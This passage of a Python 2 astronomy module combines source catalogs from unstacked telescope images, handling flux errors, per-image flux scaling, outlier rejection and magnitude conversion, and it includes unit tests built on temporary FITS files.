parser.add_option('-m', '--mastercat',
help = 'Master catalog to pull non Flux columns from',
dest = 'mastercat')
parser.add_option('-f', '--nofluxscale',
help = 'Turn off fluxscaling between images',
dest = 'fluxscale',
action = 'store_false',
default = __fluxscale_default__)
options, catfiles = parser.parse_args()
if options.outfile is None:
parser.error('Must specify outfile')
mastercat = None
if options.mastercat:
mastercat = ldac.openObjectFile(options.mastercat)
images = [ loadImage(catfile) for catfile in catfiles ]
combinedcat = combineCats(images,
instrum = options.instrum,
mastercat = mastercat,
fluxscale = options.fluxscale)
hdus = [pyfits.PrimaryHDU(), combinedcat.hdu]
if mastercat:
hdus.extend(_transferOtherHDUs(options.mastercat))
else:
hdus.extend(_transferOtherHDUs(catfiles[0]))
hdulist = pyfits.HDUList(hdus)
hdulist.writeto(options.outfile, overwrite=True)
############################################################
# INTERNAL CLASSES
############################################################
class UnknownFluxTypeException(Exception): pass
class Image(object):
def __init__(self, cat, rms, apers, gain):
self.cat = cat
self.rms = rms
self.apers = apers
self.gain = gain
if 'ISOAREA_DETECT' in cat:
self.area = self.cat['ISOAREA_DETECT']
else:
self.area = self.cat['NPIX']
def getFluxErr(self, fluxkey = 'FLUX_APER', fluxscale = 1.):
if fluxkey == 'FLUX_APER':
area = numpy.pi*(self.apers/2.)**2
elif fluxkey == 'FLUX_ISO':
area = self.area
else:
raise UnknownFluxTypeException(fluxkey)
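        # Error model (descriptive note): background noise scales with the measurement
        # area, with the per-pixel RMS inflated by __resampling_sigma_scaling__
        # (presumably to allow for noise correlations introduced by resampling), plus an
        # approximate Poisson term |flux|/gain; 'fluxscale' rescales the Poisson term
        # when fluxes have been rescaled between images.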
return numpy.sqrt(area*(__resampling_sigma_scaling__*self.rms)**2 + fluxscale*numpy.abs(self.cat[fluxkey])/self.gain)
#######################
# UTILITY FUNCTIONS
#######################
def cuts(photflux, errs, peakvals, mask=None):
if mask is None:
mask = numpy.ones_like(photflux)
else:
mask = numpy.copy(mask)
mask = _setMask(mask, peakvals > 20000)
mask[numpy.isnan(photflux)] = 0
mask[errs == 0.] = 0
return mask
################################
def adjustFlux(fluxs, fluxerrs, gain, backgroundRMS, fluxscales):
newFlux = fluxs*fluxscales
newfluxerrs = numpy.sqrt(backgroundRMS + newFlux/gain)/newFlux
return newFlux, newfluxerrs
#######################
def createFluxScalingMask(photflux, flags, mask = None):
if mask is None:
mask = numpy.ones_like(photflux)
else:
mask = numpy.copy(mask)
mask = _setMask(mask, numpy.logical_or(flags == 1, flags == 3))
mask[photflux < 0] = 0
return mask
#######################
def _measureFluxScaling_scalar(mags, magerrs, mask):
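    # Descriptive note: for objects detected in more than two images, compare each
    # image's magnitude with the object's mean magnitude, average the offsets per image
    # (weighted by the inverse variance of each object's magnitude scatter), and return
    # the per-image magnitude offsets converted to multiplicative flux scalings
    # via 10**(-0.4 * offset).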
mask = numpy.copy(mask)
mask[numpy.logical_not(numpy.isfinite(mags))] = 0
mask[mags == __bad_mag__ ] = 0
mask[mags == 99 ] = 0
mask[mags == -99 ] = 0
nObs = numpy.sum(mask, axis=-1)
nImages = mags.shape[-1]
nGals = mags.shape[0]
aveMags = numpy.zeros(nGals)
stderr = numpy.zeros(nGals)
for i in xrange(nGals):
vals = mags[i][mask[i] == 1]
if len(vals) > 2:
aveMags[i] = numpy.average(vals)
stderr[i] = numpy.std(vals)
aveMagsMatrix = numpy.column_stack(nImages*[aveMags])
deltaMag = mags - aveMagsMatrix
allOffsets = numpy.zeros(nImages)
for i in xrange(nImages):
goodMags = deltaMag[:,i][numpy.logical_and(nObs > 2, mask[:,i] == 1)]
weights = 1./stderr[numpy.logical_and(nObs > 2, mask[:,i] == 1)]**2
if len(goodMags) == 0:
return numpy.ones(nImages)
if numpy.logical_or(weights == 0, numpy.isinf(weights)).all():
weights = numpy.ones_like(weights)
allOffsets[i] = -numpy.average(goodMags, weights=weights)
return 10**(-.4*allOffsets)
########################################
def measureFluxScaling(mags, magerrs, mask):
if len(mags.shape) == 2:
return _measureFluxScaling_scalar(mags, magerrs, mask)
nApers = mags.shape[1]
nImages = mags.shape[2]
scalings = numpy.zeros((nApers, nImages))
for aper in xrange(nApers):
scalings[aper,:] = _measureFluxScaling_scalar(mags[:,aper,:],
magerrs[:,aper,:],
mask[:,aper,:])
return scalings
########################################
def _setMask(mask, condition):
if len(mask.shape) == 2:
mask[condition] = 0
else:
for i in xrange(mask.shape[1]):
submask = mask[:,i,:]
submask[condition] = 0
mask[:,i,:] = submask
return mask
#########################################
def statCombineFluxs(fluxs, errs, mask, sigmaReject = 5):
########
def identifyOutliers(fluxs, errs, meanFlux, meanErr, nsigma):
refflux = _stackFluxs(nImages*[meanFlux])
refsig = _stackFluxs(nImages*[meanErr])
refsig = numpy.sqrt(refsig**2 + errs**2)
pull = (fluxs - refflux)/refsig
outliers = numpy.zeros_like(fluxs)
outliers[abs(pull) > 5] = 1
return outliers
##########
outliers = numpy.zeros_like(mask)
nImages = fluxs.shape[-1]
for i in xrange(2):
local_mask = numpy.ones_like(mask)
local_mask[numpy.logical_or(mask == 0, outliers == 1)] = 0
flux, err = _weightedAverage(fluxs, errs, local_mask)
skew, std_emp = calcSkewandStd(fluxs, local_mask)
outliers = identifyOutliers(fluxs, errs, flux, err, sigmaReject)
nOutliers = outliers.sum(axis=-1)
allRejected = (nOutliers == nImages)
if allRejected.any():
rejectedFluxs = fluxs[allRejected]
rejectedErrs = errs[allRejected]
rejectedMeanErr = err[allRejected]
rejectedMask = mask[allRejected]
medianVals = _median(rejectedFluxs, rejectedMask)
rejectedOutliers = identifyOutliers(rejectedFluxs, rejectedErrs, medianVals, rejectedMeanErr, sigmaReject)
outliers[allRejected] = rejectedOutliers
return skew, err / std_emp
####################################
def _weightedAverage(fluxs, errs, mask):
nImages = fluxs.shape[-1]
nGals = fluxs.shape[0]
local_errs = numpy.copy(errs)
local_errs[mask == 0] = 1
weights = mask * (1./local_errs**2)
weightsum = weights.sum(axis=-1)
flux = (weights*fluxs).sum(axis=-1, dtype=numpy.float64)/weightsum
err = numpy.sqrt(1./weightsum)
err[numpy.isnan(flux)] = __bad_flux__
flux[numpy.isnan(flux)] = __bad_flux__
return flux, err
###################
def calcSkewandStd(fluxs, mask):
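    # Descriptive note: per object, this computes the bias-corrected sample skewness
    #   G1 = sqrt(n*(n-1)) / (n-2) * m3 / m2**1.5
    # of the masked fluxes, plus the standard error of the mean (population std / sqrt(n)).
    # Fewer than 3 observations yields NaN skew; zero observations yields std = -1.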
nobs = mask.sum(axis=-1)
unweightedMean = (fluxs*mask).sum(axis=-1) / nobs
unweightedMeanGrid = numpy.zeros_like(fluxs)
if len(fluxs.shape) == 2:
unweightedMeanGrid = (unweightedMeanGrid.T + unweightedMean).T
unweightedStd = numpy.zeros(fluxs.shape[0])
skew = numpy.zeros(fluxs.shape[0])
for i in range(fluxs.shape[0]):
unweightedStd[i] = numpy.sqrt(numpy.sum((fluxs[i] - unweightedMeanGrid[i])[mask[i] > 0]**2)/nobs[i])
skew[i] = (numpy.sqrt(nobs[i]*(nobs[i] - 1))/(nobs[i] - 2))*(1./nobs[i])*numpy.sum((fluxs[i] - unweightedMeanGrid[i])[mask[i] > 0]**3)/(unweightedStd[i]**3)
else:
for i in range(fluxs.shape[2]):
unweightedMeanGrid[:,:,i] = unweightedMean
unweightedStd = numpy.zeros(fluxs.shape[:2])
skew = numpy.zeros(fluxs.shape[:2])
for i in range(fluxs.shape[0]):
unweightedStd[i,:] = numpy.sqrt(numpy.sum((fluxs[i] - unweightedMeanGrid[i])[mask[i] > 0]**2)/nobs[i])
skew[i,:] = (numpy.sqrt(nobs[i]*(nobs[i] - 1))/(nobs[i] - 2))*(1./nobs[i])*numpy.sum((fluxs[i] - unweightedMeanGrid[i])[mask[i] > 0]**3)/(unweightedStd[i]**3)
std = unweightedStd / numpy.sqrt(nobs)
std[nobs == 0] = -1
skew[nobs < 3] = numpy.nan
return skew, std
####################################
def _median(fluxs, mask):
##############
def scalarMedian(fluxs, mask):
nGals = len(fluxs)
flux = numpy.zeros(nGals)
for i in xrange(nGals):
flux[i] = numpy.median(fluxs[i][mask[i] == 1])
return flux
###############
fluxIsVector = fluxs.ndim == 3
if fluxIsVector:
nGals = fluxs.shape[0]
nApers = fluxs.shape[1]
flux = numpy.zeros((nGals, nApers))
for aper in xrange(nApers):
flux[:,aper] = scalarMedian(fluxs[:,aper,:], mask[:,aper,:])
return flux
else:
return scalarMedian(fluxs, mask)
####################################
def _stackFluxs(fluxs):
nfluxs = len(fluxs)
fluxshape = fluxs[0].shape
naxis = len(fluxshape)
resultshape = []
for i in xrange(naxis):
resultshape.append(fluxshape[i])
resultshape.append(nfluxs)
result = numpy.zeros(tuple(resultshape))
selector = [slice(fluxshape[i]) for i in xrange(naxis)]
selector.append(0)
for i in xrange(nfluxs):
selector[-1] = i
result[selector] = fluxs[i]
return result
########################################
def calcMags(fluxs, errs):
mags = -2.5*numpy.log10(fluxs)
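    # 1.0857 ~= 2.5/ln(10): first-order propagation of the relative flux error to magnitudes.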
magerrs = 1.0857 * errs / fluxs
magerrs[ numpy.logical_not(numpy.isfinite(mags)) ] = 0
mags[ numpy.logical_not(numpy.isfinite(mags)) ] = __bad_mag__
magerrs[mags > 99] = 99
magerrs[magerrs > 99] = 99
mags[mags > 99 ] = 99
return mags, magerrs
######################################
_commentFilter = re.compile('^#')
def readBackgroundRMS(file):
with open(file) as rmsFile:
for line in rmsFile.readlines():
if _commentFilter.match(line):
continue
try:
rms = float(line)
return rms
except:
continue
return rms
###################################
def readGain(cat):
fields = ldac.openObjectFile(cat, 'FIELDS')
return fields['GAIN']
###################################
_aperFilter = re.compile('^SEXAPED')
def readApers(cat):
fields = ldac.openObjectFile(cat, 'FIELDS')
apers = []
for key in sorted(fields.keys()):
if _aperFilter.match(key):
aper_diameter = fields[key][0]
if aper_diameter > 0:
apers.append(aper_diameter)
return numpy.array(apers)
#################################################
# TESTING
#################################################
class TestComponents(unittest.TestCase):
def testReadApers(self):
catFile = 'test_measureUnstackedPhot_readapers.cat'
def cleanUp():
if os.path.exists(catFile):
os.remove(catFile)
try:
if not os.path.exists(catFile):
cols = [pyfits.Column(name = 'SEXAPED1',
format = 'E',
array = numpy.array([10])),
pyfits.Column(name = 'SEXAPED2',
format = 'E',
array = numpy.array([15])),
pyfits.Column(name = 'SEXAPED3',
format = 'E',
array = numpy.array([0])),
pyfits.Column(name = 'SEXAPED4',
format = 'E',
array = numpy.array([0]))]
hdu = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
hdu.header['EXTNAME']= 'FIELDS'
hdu.writeto(catFile, overwrite = True)
apers = readApers(catFile)
self.assertTrue((apers == numpy.array([10,15])).all())
finally:
cleanUp()
########################### #
def testReadBackgroundRMS(self):
rmsFile = 'test_measureUnstackedPhot_readBkgRMS.txt'
def cleanUp():
if os.path.exists(rmsFile):
os.remove(rmsFile)
try:
if not os.path.exists(rmsFile):
with open(rmsFile, 'w') as output:
output.write('#Aperture\tSigma\n')
output.write('.15\n')
RMS = readBackgroundRMS(rmsFile)
self.assertEquals(RMS, .15 )
finally:
cleanUp()
###################
def testReadGain(self):
catFile = 'test_measureUnstackedPhot_readgain.cat'
def cleanUp():
if os.path.exists(catFile):
os.remove(catFile)
try:
if not os.path.exists(catFile):
cols = [pyfits.Column(name = 'GAIN',
format = 'D',
array = numpy.array([900]))]
hdu = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
hdu.header['EXTNAME']= 'FIELDS'
hdu.writeto(catFile, overwrite = True)
gain = readGain(catFile)
self.assertEqual(gain, 900)
finally:
cleanUp()
##################
def testSetMask_scalar(self):
mask = numpy.ones((10,6))
flag = numpy.array(10*[[0,0,0,0,0,1]])
newmask = _setMask(mask, flag > 0)
self.assertTrue((newmask == (1 - flag)).all())
#################
def testSetMask_vector(self):
mask = numpy.ones((10,5,6))
flag = numpy.array(10*[[0,0,0,0,0,1]])
expected = 1 - flag
newmask = _setMask(mask, flag > 0)
self.assertEquals(newmask.shape, (10,5,6))
for i in xrange(5):
self.assertTrue((newmask[:,i,:] == expected).all())
#################
def testCalcMags(self):
fluxs = 5*numpy.ones(30)
fluxerrs = .1*numpy.ones(30)
fluxs[0] = 1e-45
fluxs[1] = 1e-20
fluxs[25:] = -1
fluxs[-1] = 0
mags, magerrs, = calcMags(fluxs, fluxerrs)
self.assertTrue( (mags[0] == 99) )
self.assertTrue( (mags[2:25] == -2.5*numpy.log10(5) ).all() )
self.assertTrue( (mags[25:] == __bad_mag__).all() )
self.assertTrue( max(mags) <= 99 )
self.assertTrue( (magerrs[0] == 99) )
self.assertTrue( (magerrs[2:25] == (1.0857*.1/5)).all() )
self.assertTrue( (magerrs[25:] == 0).all() )
self.assertTrue( max(magerrs) <= 99 )
#################
class TestImage(unittest.TestCase):
def setUp(self):
self.catFile = 'test_measureUnstackedPhot_loadimage.cat0'
if not os.path.exists(self.catFile):
cols = [pyfits.Column(name = 'GAIN',
format = 'D',
array = numpy.array([900])),
pyfits.Column(name = 'SEXAPED1',
format = 'E',
array = numpy.array([10])),
pyfits.Column(name = 'SEXAPED2',
format = 'E',
array = numpy.array([15])),
pyfits.Column(name = 'SEXAPED3',
format = 'E',
array = numpy.array([0]))]
fields = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
fields.header['EXTNAME']= 'FIELDS'
cols = [pyfits.Column(name = 'Xpos',
format = 'E',
array = numpy.random.uniform(0,10000,200)),
pyfits.Column(name='FLUX_APER',
format = '2E',
array = numpy.ones((200,2))),
pyfits.Column(name='FLUX_ISO',
format = 'E',
array = numpy.ones(200)),
pyfits.Column(name='ISOAREA_DETECT',
format='E',
array = 10*numpy.ones(200))]
objects = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
objects.header['EXTNAME']= 'OBJECTS'
cols = [pyfits.Column(name='BACKGROUND_RMS', format='E', array = [0.15])]
photinfo = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
photinfo.header['EXTNAME']= 'PHOTINFO'
hdulist = pyfits.HDUList([pyfits.PrimaryHDU(), objects, fields, photinfo])
hdulist.writeto(self.catFile, overwrite = True)
def tearDown(self):
if os.path.exists(self.catFile):
os.remove(self.catFile)
def testLoadImage(self):
image = loadImage(self.catFile)
self.assertTrue(isinstance(image, Image))
self.assertTrue(isinstance(image.cat, ldac.LDACCat))
self.assertEqual(image.gain, 900)
self.assertEqual(image.rms, .15)
self.assertTrue((image.apers == numpy.array([10,15])).all())
###############
def testImageFluxErr_Aper(self):
image = loadImage(self.catFile)
errors = image.getFluxErr()
self.assertEquals(errors.shape, (200,2))
aper1Area = numpy.pi*(5**2)
aper2Area = numpy.pi*(7.5**2)
self.assertTrue((numpy.abs(errors[:,0] - numpy.sqrt(aper1Area*(.15*__resampling_sigma_scaling__)**2 + 1./900)) < 1e-4).all())
self.assertTrue((numpy.abs(errors[:,1] - numpy.sqrt(aper2Area*(.15*__resampling_sigma_scaling__)**2 + 1./900)) < 1e-4).all())
###############
def testImageFluxErr_Iso(self):
image = loadImage(self.catFile)
image.cat['ISOAREA_DETECT'][100:] = 100
errors = image.getFluxErr(fluxkey='FLUX_ISO')
self.assertEquals(errors.shape, (200,))
self.assertTrue((numpy.abs(errors[:100] - numpy.sqrt(10*(.15*__resampling_sigma_scaling__)**2 + 1./900)) < 1e-4).all())
self.assertTrue((numpy.abs(errors[100:] - numpy.sqrt(100*(.15*__resampling_sigma_scaling__)**2 + 1./900)) < 1e-4).all())
################
##################
class TestUnstackedPhotometry(unittest.TestCase):
def setUp(self):
self.nImages = 5
self.nObjs = 200
self.images = []
for i in xrange(self.nImages):
fluxs = numpy.ones(self.nObjs)
fluxerrs = numpy.ones_like(fluxs)
flags = numpy.zeros_like(fluxs)
imaflags = numpy.ones_like(fluxs)
BackGr = numpy.zeros_like(fluxs)
MaxVal = 0.1*numpy.ones_like(fluxs)
NPIX = numpy.zeros(self.nObjs)
cols = []
cols.append(pyfits.Column(name='FLUX_APER', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='FLUXERR_APER', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='Flag', format = 'J', array = flags))
cols.append(pyfits.Column(name='IMAFLAGS_ISO', format = 'J', array = imaflags))
cols.append(pyfits.Column(name='BackGr', format = 'E', array = BackGr))
cols.append(pyfits.Column(name='MaxVal', format = 'E', array = MaxVal))
cols.append(pyfits.Column(name='NPIX', format='E', array = NPIX))
cat = ldac.LDACCat(pyfits.BinTableHDU.from_columns(cols))
self.images.append(Image(cat = cat, apers = numpy.ones(1), rms = 0., gain = 1.))
############
def testSimple(self):
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertEqual(chipid, 1)
self.assertEqual(len(flux), self.nObjs)
self.assertEqual(len(fluxerr), self.nObjs)
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages)) < 1e-8).all() )
###########
def testFluxs(self):
expectedFluxs = 10**(-.4*numpy.random.uniform(-9,-2, self.nObjs))
for image in self.images:
catflux = image.cat['FLUX_APER']
image.cat['FLUX_APER'][:] = expectedFluxs + 0.05*numpy.random.standard_normal(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - expectedFluxs) < 1e-1).all() )
############
def testCuts(self):
self.images[-1].cat['MaxVal'][:] = 1e7*numpy.ones(self.nObjs)
self.images[-1].cat['FLUX_APER'][:] = 1e7*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages - 1)) < 1e-8).all() )
############
def testExcludeErr0(self):
self.images[-1].cat['FLUXERR_APER'][:] = numpy.zeros(self.nObjs)
self.images[-1].cat['FLUX_APER'][:] = 2*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages - 1)) < 1e-8).all() )
############
def testChipIds(self):
self.images[-1].cat['IMAFLAGS_ISO'][:] = 16*numpy.ones(self.nObjs)
self.images[-2].cat['FLUX_APER'][:] = 2*numpy.ones(self.nObjs)
self.images[-2].cat['IMAFLAGS_ISO'][:] = 2*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
self.assertEqual(len(combinedFluxs.keys()), 2)
self.assertTrue( 1 in combinedFluxs.keys() )
self.assertTrue( 2 in combinedFluxs.keys() )
for i in [1,2]:
flux, fluxerr = combinedFluxs[i]
self.assertTrue( (numpy.abs(flux - i) < 1e-8).all() )
##############
def testOutliers(self):
self.images[-1].cat['FLUX_APER'][:] = 50*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages-1)) < 1e-8).all() )
##############
def testFluxerr_Area(self):
for image in self.images:
image.rms = 1./__resampling_sigma_scaling__
image.apers = numpy.sqrt(4/numpy.pi)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - numpy.sqrt(2./self.nImages)) < 1e-5).all() )
###############
def testFluxScale(self):
inputFluxscales = numpy.ones(self.nImages)
inputFluxscales[:self.nImages/2] = .5
inputFluxscales[self.nImages/2:] = 1.5
for image, fluxscale in zip(self.images, inputFluxscales):
image.cat['FLUX_APER'][:] = image.cat['FLUX_APER']*fluxscale
combinedFluxs = measureUnstackedPhotometry(self.images,
fluxscale = True)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
flux = flux - flux[0]
self.assertTrue( (numpy.abs( flux ) < 1e-8).all() )
################
def testFluxKey(self):
self.images = []
for i in xrange(self.nImages):
fluxs = numpy.ones(self.nObjs)
fluxerrs = numpy.ones_like(fluxs)
flags = numpy.zeros_like(fluxs)
imaflags = numpy.ones_like(fluxs)
BackGr = numpy.zeros_like(fluxs)
MaxVal = 0.1*numpy.ones_like(fluxs)
NPIX = numpy.zeros_like(fluxs)
cols = []
cols.append(pyfits.Column(name='FLUX_APER', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='FLUXERR_APER', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='FLUX_ISO', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='FLUXERR_ISO', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='Flag', format = 'J', array = flags))
cols.append(pyfits.Column(name='IMAFLAGS_ISO', format = 'J', array = imaflags))
cols.append(pyfits.Column(name='BackGr', format = 'E', array = BackGr))
cols.append(pyfits.Column(name='MaxVal', format = 'E', array = MaxVal))
cols.append(pyfits.Column(name='NPIX', format = 'E', array = NPIX))
cat = ldac.LDACCat(pyfits.BinTableHDU.from_columns(cols))
self.images.append(Image(cat = cat, rms = 0., apers = numpy.ones(1), gain = 1.))
combinedFluxs = measureUnstackedPhotometry(self.images, fluxkey = 'FLUX_APER')
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertEqual(chipid, 1)
self.assertEqual(len(flux), self.nObjs)
self.assertEqual(len(fluxerr), self.nObjs)
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages)) < 1e-8).all() )
####################
###########################
class TestUnstackedPhotometry_vector(unittest.TestCase):
def setUp(self):
self.nImages = 5
self.nApers = 4
self.nObjs = 200
self.images = []
for i in xrange(self.nImages):
fluxs = numpy.ones((self.nObjs, self.nApers))
fluxerrs = numpy.ones_like(fluxs)
flags = numpy.zeros(self.nObjs)
imaflags = numpy.ones_like(flags)
BackGr = numpy.zeros_like(flags)
MaxVal = 0.1*numpy.ones_like(flags)
NPIX = numpy.zeros(self.nObjs)
cols = []
cols.append(pyfits.Column(name='FLUX_APER',
format = '%dE' % self.nApers,
array = fluxs))
cols.append(pyfits.Column(name='FLUXERR_APER',
format = '%dE' % self.nApers,
array = fluxs))
cols.append(pyfits.Column(name='Flag', format = 'J', array = flags))
cols.append(pyfits.Column(name='IMAFLAGS_ISO', format = 'J', array = imaflags))
cols.append(pyfits.Column(name='BackGr', format = 'E', array = BackGr))
cols.append(pyfits.Column(name='MaxVal', format = 'E', array = MaxVal))
cols.append(pyfits.Column(name='NPIX', format = 'E', array = NPIX))
cat = ldac.LDACCat(pyfits.BinTableHDU.from_columns(cols))
self.images.append(Image(cat = cat, rms = 0, apers= numpy.ones(self.nApers), gain = 1.))
############
def testSimple(self):
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertEqual(chipid, 1)
self.assertEqual(flux.shape, (self.nObjs, self.nApers))
self.assertEqual(fluxerr.shape, (self.nObjs, self.nApers))
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages)) < 1e-8).all() )
###########
def testFluxs(self):
expectedFluxs = 10**(-.4*numpy.random.uniform(-9,-2, (self.nObjs, self.nApers)))
for image in self.images:
catflux = image.cat['FLUX_APER']
image.cat['FLUX_APER'][:,:] = expectedFluxs + 0.05*numpy.random.standard_normal((self.nObjs, self.nApers))
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - expectedFluxs) < 1e-1).all() )
############
def testCuts(self):
self.images[-1].cat['MaxVal'][:] = 1e7*numpy.ones(self.nObjs)
self.images[-1].cat['FLUX_APER'][:] = 1e7*numpy.ones((self.nObjs, self.nApers))
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages - 1)) < 1e-8).all() )
############
def testChipIds(self):
self.images[-1].cat['IMAFLAGS_ISO'][:] = 16*numpy.ones(self.nObjs)
self.images[-2].cat['FLUX_APER'][:,:] = 2*numpy.ones((self.nObjs, self.nApers))
self.images[-2].cat['IMAFLAGS_ISO'][:] = 2*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
self.assertEqual(len(combinedFluxs.keys()), 2)
self.assertTrue( 1 in combinedFluxs.keys() )
self.assertTrue( 2 in combinedFluxs.keys() )
for i in [1,2]:
flux, fluxerr = combinedFluxs[i]
self.assertTrue( (numpy.abs(flux - i) < 1e-8).all() )
##############
def testOutliers(self):
self.images[-1].cat['FLUX_APER'][:,:] = 40*numpy.ones((self.nObjs, self.nApers))
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages-1)) < 1e-8).all() )
##############
def testFluxerr_Area(self):
for image in self.images:
image.rms = 1./__resampling_sigma_scaling__
image.apers = numpy.ones(self.nApers)*numpy.sqrt(4/numpy.pi)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - numpy.sqrt(2./self.nImages)) < 1e-5).all() )
###############
def testFluxScale(self):
inputFluxscales = numpy.ones(self.nImages)
inputFluxscales[:self.nImages/2] = .5
inputFluxscales[self.nImages/2:] = 1.5
for image, fluxscale in zip(self.images, inputFluxscales):
image.cat['FLUX_APER'][:,:] = image.cat['FLUX_APER']*fluxscale
combinedFluxs = measureUnstackedPhotometry(self.images,
fluxscale = True)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
flux = flux - flux[0]
self.assertTrue( (numpy.abs( flux ) < 1e-8).all() )
########################
def fluxErr(flux, areanoise, gain):
return numpy.sqrt(flux/gain + areanoise)
############
class TestFluxScale(unittest.TestCase):
def setUp(self):
self.nObjs = 10000
self.nImages = 6
self.areanoise = 1.5
self.gain=900
self.object_TargetFluxs = 10**(-.4*numpy.random.uniform(-9,-3,self.nObjs))
self.object_FluxErrs = fluxErr(self.object_TargetFluxs, self.areanoise,
self.gain)
self.Observed_Fluxs = numpy.zeros((self.nObjs, self.nImages))
for i in xrange(self.nObjs):
self.Observed_Fluxs[i,:] = numpy.random.poisson(lam=self.object_TargetFluxs[i], size=self.nImages)
self.Observed_FluxErrs = fluxErr(self.Observed_Fluxs,
self.areanoise, self.gain)
self.mag_err = 1.0857*self.Observed_FluxErrs / self.Observed_Fluxs
self.mag_aper = -2.5*numpy.log10(self.Observed_Fluxs) + 27
self.mask = numpy.ones_like(self.Observed_Fluxs)
##################
def testMeasureFluxScaling_nooffset(self):
scalings = measureFluxScaling(self.mag_aper,
self.mag_err,
self.mask)
self.assertEquals(len(scalings), self.nImages)
self.assertTrue( (abs(scalings - 1) < .01).all() )
#################
def testMeasureFluxScaling_offset(self):
inputScalings = numpy.ones(self.nImages)
inputScalings[:3] = .5
inputScalings[3:] = 1.5
magScaling = -2.5*numpy.log10(inputScalings)
magScaling = magScaling - numpy.mean(magScaling)
inputScalings = 10**(-.4*magScaling)
measuredFlux = inputScalings*self.Observed_Fluxs
mag_aper = -2.5*numpy.log10(measuredFlux) + 27
mag_err = 1.0857*fluxErr(measuredFlux, self.areanoise, self.gain) / measuredFlux
scalings = measureFluxScaling(mag_aper, mag_err, self.mask)
self.assertEquals(len(scalings), self.nImages)
scaledFluxs = measuredFlux * scalings
for i in xrange(self.nImages):
index = self.nImages - i - 1
scaledFluxs[:,index] = scaledFluxs[:,index] - scaledFluxs[:,0]
###################
def testMeasureFluxScaling_offset_simple(self):
inputScalings = numpy.ones(self.nImages)
inputScalings[:3] = .5
inputScalings[3:] = 1.5
measuredMags = numpy.ones((self.nObjs, self.nImages))
measuredErr = .1*numpy.ones_like(measuredMags)
for i in xrange(self.nImages):
measuredMags[:,i] = - 2.5*numpy.log10(inputScalings[i])
scalings = measureFluxScaling(measuredMags, measuredErr, self.mask)
measuredFluxs = 10**(-.4*measuredMags)
measuredFluxs = measuredFluxs * scalings
offset = measuredFluxs[0,0]
measuredFluxs = measuredFluxs - offset
self.assertTrue( (numpy.abs(measuredFluxs) < .1).all() )
###################
def testHandleBadMags(self):
expectedMags = numpy.zeros(self.nObjs)
expectedMagerrs = .1*numpy.ones(self.nObjs)
inputScalings = numpy.ones(self.nImages)
measuredMags = numpy.ones((self.nObjs, self.nImages))
measuredErr = .1*numpy.ones_like(measuredMags)
for i in xrange(self.nImages):
measuredMags[:,i] = expectedMags - 2.5*numpy.log10(inputScalings[i])
measuredMags[-10:,3] = __bad_mag__
scalings = measureFluxScaling(measuredMags, measuredErr, self.mask)
measuredFluxs = 10**(-.4*measuredMags)
scaledFluxs = measuredFluxs*scalings
scaledFluxs = scaledFluxs - scaledFluxs[0,0]
self.assertTrue( (numpy.abs(scaledFluxs[measuredMags != __bad_mag__] ) < 0.1).all() )
########################
def testSingleObservations(self):
measuredMags = numpy.ones((self.nObjs, self.nImages))
measuredErr = .1*numpy.ones_like(measuredMags)
